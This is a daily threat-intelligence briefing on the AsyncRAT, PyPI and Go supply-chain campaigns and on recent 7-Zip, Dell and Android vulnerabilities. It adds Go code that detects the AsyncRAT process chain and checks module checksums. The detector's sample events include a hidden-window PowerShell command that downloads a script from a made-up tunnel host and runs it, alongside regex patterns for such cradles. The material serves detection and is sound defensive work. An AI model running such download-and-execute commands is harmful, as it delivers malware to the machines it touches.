
Cyware Daily Threat Intelligence, February 04, 2025


Daily Threat Briefing Feb 4, 2025

Cybercriminals are finding new ways to weaponize everyday tools, and this time, they’re using TryCloudflare to hide their tracks. Researchers uncovered a phishing campaign that stealthily delivers AsyncRAT via Python scripting and cloud tunnels. The attack starts with a Dropbox link leading to a maze of scripts that ultimately drop a harmful payload.

Even AI developers aren’t safe from deception. Threat actors have infiltrated PyPI with two malicious packages disguised as legitimate tools for DeepSeek. These fraudulent packages steal sensitive data, from user credentials to API keys, proving once again that trust in open-source repositories can be a double-edged sword.

One small vulnerability, one massive risk. Russian cybercriminals exploited a zero-day in 7-Zip to deliver SmokeLoader in attacks on Ukrainian entities. By bypassing Windows Mark-of-the-Web protections, the attackers tricked victims into executing malware-laden files.

Top Malware Reported in the Last 24 Hours

AsyncRAT abuses Python and TryCloudflare

Forcepoint’s X-Labs research team discovered a new malware campaign that delivers AsyncRAT using Python scripting and TryCloudflare tunnels. The campaign starts with a phishing email containing a Dropbox link that leads to a ZIP file. The ZIP contains a shortcut that points to a TryCloudflare URL, which in turn serves an LNK file. Opening the LNK triggers PowerShell, which retrieves an obfuscated JavaScript file; that script fetches a second ZIP containing the Python script that finally runs the AsyncRAT payload. TryCloudflare quick tunnels give an attacker a throwaway hostname under a legitimate Cloudflare domain without needing an account or infrastructure of their own, so domain reputation alone does little here; the detection opportunity is in the process chain (explorer.exe spawning PowerShell, a script host running JavaScript, a Python interpreter dropped into a user-writable directory) rather than in the URLs.
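The chain above is easier to catch on the endpoint than at the URL layer. The following is an added example, not Forcepoint's code or anything from the original report: a small set of process-creation rules in Go that encode the stages described (explorer.exe launching a shell that fetches from a trycloudflare.com tunnel, a PowerShell download cradle with evasion flags, a script host running JavaScript from Temp/AppData, and a Python interpreter executing from a user-writable path). The `ProcEvent` fields and the `SampleEvents` telemetry are constructed for illustration; the hostnames and paths are invented, not indicators from the campaign.

```go
package main

import (
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// ProcEvent is a minimal process-creation record with the fields the rules
// below need (Sysmon Event ID 1 and most EDRs carry equivalents). The field
// names are my own, not a vendor schema.
type ProcEvent struct {
	ParentImage string
	Image       string
	CommandLine string
}

var (
	// Quick tunnels hand out random hostnames under trycloudflare.com, so the
	// domain itself is legitimate and only the pattern is usable.
	tunnelURL    = regexp.MustCompile(`(?i)https?://[a-z0-9-]+\.trycloudflare\.com`)
	downloadVerb = regexp.MustCompile(`(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b`)
	evasionFlag  = regexp.MustCompile(`(?i)-(w(indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass|enc|encodedcommand)\b`)
	userWritable = regexp.MustCompile(`(?i)\\(appdata|temp|programdata|public|downloads)\\`)
	shells       = map[string]bool{"powershell.exe": true, "pwsh.exe": true, "cmd.exe": true, "wscript.exe": true, "mshta.exe": true}
)

// baseName lowercases the file name of a Windows path, whatever OS this runs on.
func baseName(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, `/`)))
}

// Assess returns one reason per rule the event matches; an empty slice means no finding.
func Assess(e ProcEvent) []string {
	var reasons []string
	parent, image := baseName(e.ParentImage), baseName(e.Image)
	cmd := strings.ToLower(e.CommandLine)
	// 1. A double-clicked LNK shows up as explorer.exe spawning a shell; combined
	//    with a TryCloudflare URL that is the first stage of the chain.
	if parent == "explorer.exe" && shells[image] && tunnelURL.MatchString(cmd) {
		reasons = append(reasons, "shell launched from explorer.exe fetching from a TryCloudflare tunnel")
	}
	// 2. PowerShell download cradle run with window-hiding or policy-bypass flags.
	if (image == "powershell.exe" || image == "pwsh.exe") && downloadVerb.MatchString(cmd) && evasionFlag.MatchString(cmd) {
		reasons = append(reasons, "PowerShell download cradle with evasion flags")
	}
	// 3. Script host executing a JavaScript file from a user-writable location.
	if (image == "wscript.exe" || image == "cscript.exe") && strings.Contains(cmd, ".js") && userWritable.MatchString(cmd) {
		reasons = append(reasons, "script host running JavaScript from a user-writable path")
	}
	// 4. A Python interpreter living in Temp/AppData is itself unusual on a workstation.
	if (image == "python.exe" || image == "pythonw.exe") && userWritable.MatchString(e.Image) {
		reasons = append(reasons, "Python interpreter executing from a user-writable path")
	}
	return reasons
}

// SampleEvents are constructed telemetry records mirroring the reported chain;
// none are real captures and the tunnel hostname is invented.
var SampleEvents = []ProcEvent{
	{`C:\Windows\explorer.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -w hidden -ep bypass -c "iwr https://quiet-river-sample.trycloudflare.com/s1 -OutFile $env:TEMP\s1.js; wscript $env:TEMP\s1.js"`},
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\System32\wscript.exe`,
		`wscript C:\Users\alice\AppData\Local\Temp\s1.js`},
	{`C:\Windows\System32\cmd.exe`, `C:\Users\alice\AppData\Local\Temp\py\python.exe`,
		`C:\Users\alice\AppData\Local\Temp\py\python.exe C:\Users\alice\AppData\Local\Temp\py\loader.py`},
	{`C:\Windows\explorer.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -NoProfile -Command Get-Date`}, // benign: no download, no tunnel
}

func main() {
	for i, e := range SampleEvents {
		r := Assess(e)
		fmt.Printf("event %d (%s -> %s): %d finding(s)\n", i+1, baseName(e.ParentImage), baseName(e.Image), len(r))
		for _, reason := range r {
			fmt.Println("  -", reason)
		}
	}
}
```

Rule 2 deliberately requires both a download verb and an evasion flag, since `-NoProfile` alone appears in plenty of legitimate automation; the first three sample events each trip at least one rule and the fourth trips none.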

Info-stealer impersonates DeepSeek AI tools

Threat actors are exploiting the popularity of DeepSeek to distribute two malicious infostealer packages on PyPI, named deepseeek and deepseekai. The packages were designed to look like developer tools for the DeepSeek AI platform and were uploaded by a newly created account with no prior activity. When run, they harvested sensitive data from developers' machines, including user information and environment variables such as API keys. A trending product name paired with a brand-new publisher account is exactly the combination to treat with suspicion before installing a package for a new AI service.

Go supply chain attack 

Socket researchers found a malicious typosquat package in the Go ecosystem that imitated the popular BoltDB database module. The malicious package, named github[.]com/boltdb-go/bolt, contains a backdoor that gives the attacker remote code execution on infected systems through a C2 server. Once the Go Module Mirror had cached the malicious version, the attacker moved the Git tag on GitHub to a clean commit, so anyone reviewing the repository sees benign code while the module proxy keeps serving the cached backdoored version. Module versions are immutable once cached, which is what makes the trick work: inspecting the repository at the tag is not a sufficient check, and the checksum in go.sum (or from the checksum database) has to be compared against what the repository actually contains.
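The check that exposes a moved tag is to recompute the module checksum from the repository tree and compare it with the checksum recorded for the cached version. The following is an added example, not Socket's tooling or anything from the report: it reimplements the `h1:` checksum algorithm used by go.sum and the checksum database (sorted per-file SHA-256 summary lines, then base64 SHA-256 of the summary) over two constructed in-memory trees, a "repository at the tag" and a "what the proxy cached" copy that carries an extra init file. The version `v1.3.1`, the file contents and the extra `zz_init.go` are assumptions for illustration; only the module path comes from the report.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// ModuleFiles maps a path relative to the module root to the file's contents.
// It stands in for a checked-out Git tag or an unpacked module zip from the
// proxy; the trees below are constructed samples, not real package contents.
type ModuleFiles map[string]string

// Hash1 recomputes the "h1:" checksum that go.sum and the checksum database
// record for a module version. Inside the module zip every file is named
// "<module>@<version>/<path>"; the files are sorted by that name, a summary
// line "<sha256 hex>  <name>\n" is written for each, and the checksum is the
// base64 SHA-256 of the whole summary.
func Hash1(files ModuleFiles, zipPrefix string) (string, error) {
	type entry struct{ name, content string }
	entries := make([]entry, 0, len(files))
	for path, content := range files {
		if strings.Contains(path, "\n") {
			return "", errors.New("file names with newlines are not supported")
		}
		entries = append(entries, entry{zipPrefix + path, content})
	}
	sort.Slice(entries, func(i, j int) bool { return entries[i].name < entries[j].name })
	summary := sha256.New()
	for _, e := range entries {
		fileSum := sha256.Sum256([]byte(e.content))
		fmt.Fprintf(summary, "%x  %s\n", fileSum[:], e.name)
	}
	return "h1:" + base64.StdEncoding.EncodeToString(summary.Sum(nil)), nil
}

// Compare reports whether the proxy-cached tree and the repository tree at the
// tag produce the same checksum, returning both values for the report.
func Compare(cached, repo ModuleFiles, zipPrefix string) (same bool, cachedSum, repoSum string, err error) {
	if cachedSum, err = Hash1(cached, zipPrefix); err != nil {
		return
	}
	if repoSum, err = Hash1(repo, zipPrefix); err != nil {
		return
	}
	return cachedSum == repoSum, cachedSum, repoSum, nil
}

const (
	modulePath = "github.com/boltdb-go/bolt" // the typosquat named in the report
	version    = "v1.3.1"                    // assumed version, for illustration only
)

// repoAtTag is what a reviewer sees after the tag was moved to a clean commit.
var repoAtTag = ModuleFiles{
	"go.mod": "module " + modulePath + "\n\ngo 1.21\n",
	"db.go":  "package bolt\n\nfunc Open(path string) error { return nil }\n",
}

// cachedByProxy is a constructed stand-in for the immutable copy the module
// mirror keeps serving: the same files plus one extra file with an init().
var cachedByProxy = ModuleFiles{
	"go.mod":     repoAtTag["go.mod"],
	"db.go":      repoAtTag["db.go"],
	"zz_init.go": "package bolt\n\nfunc init() { /* hypothetical backdoor: beacon to C2 */ }\n",
}

func main() {
	prefix := modulePath + "@" + version + "/"
	same, cachedSum, repoSum, err := Compare(cachedByProxy, repoAtTag, prefix)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println("proxy cache:", cachedSum)
	fmt.Println("repo at tag:", repoSum)
	if !same {
		fmt.Println("MISMATCH: the tag no longer reflects what the proxy serves; treat the cached version as untrusted")
	}
}
```

In practice the "cached" side is the `h1:` line for the version in your go.sum or the output of `go mod download -json <module>@<version>`, and the "repo" side is the tree checked out at the tag; go.sum also records a separate `/go.mod` hash over only the go.mod file, which is the same algorithm applied to that single file.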

Top Vulnerabilities Reported in the Last 24 Hours

Zero-day campaign targets Ukraine

The Zero Day Initiative threat hunting team identified a zero-day vulnerability (CVE-2025-0411) in 7-Zip that Russian cybercrime groups exploited in a SmokeLoader campaign against Ukrainian entities starting in September 2024. Windows attaches the Mark-of-the-Web (the Zone.Identifier stream) to downloaded files, and 7-Zip normally propagates it to extracted contents; vulnerable versions did not propagate it to files extracted from an archive nested inside another archive, so the malicious executables ran without the SmartScreen and Open File warnings that would otherwise appear. Users are advised to update 7-Zip to version 24.09 or later (7-Zip has no auto-update mechanism, so the new build must be installed manually), implement strict email security measures, and train employees to recognize phishing attempts, including homoglyph attacks.

Dell releases critical security update

Dell has issued a Critical Security Update (DSA-2025-022) for its PowerProtect Data Domain systems to fix several vulnerabilities that attackers could exploit. Seven of them are rated critical, including CVE-2024-33871 and CVE-2024-41110, and could lead to unauthorized access, system compromise, and data loss. The critical CVEs stem from bundled third-party components: code execution risks in Artifex Ghostscript and Docker, and flaws in GNU Wget, HTTP handling, the Kerberos library and libgit2, among others.

February 2025 Android security updates

The February 2025 Android security updates fix 48 vulnerabilities, including a high-severity zero-day flaw (CVE-2024-53104) in the Android kernel's USB Video Class driver. The driver mishandles frame descriptors supplied by an attached USB device, leading to an out-of-bounds write that can be used to elevate privileges; because the input comes over USB, exploitation requires physical access to the device. Another critical issue (CVE-2024-45569) in Qualcomm's WLAN firmware can let a remote attacker execute code, read or modify memory, and cause crashes. Google released two security patch levels for February (2025-02-01 and 2025-02-05), with the updates available immediately for Google Pixel devices.
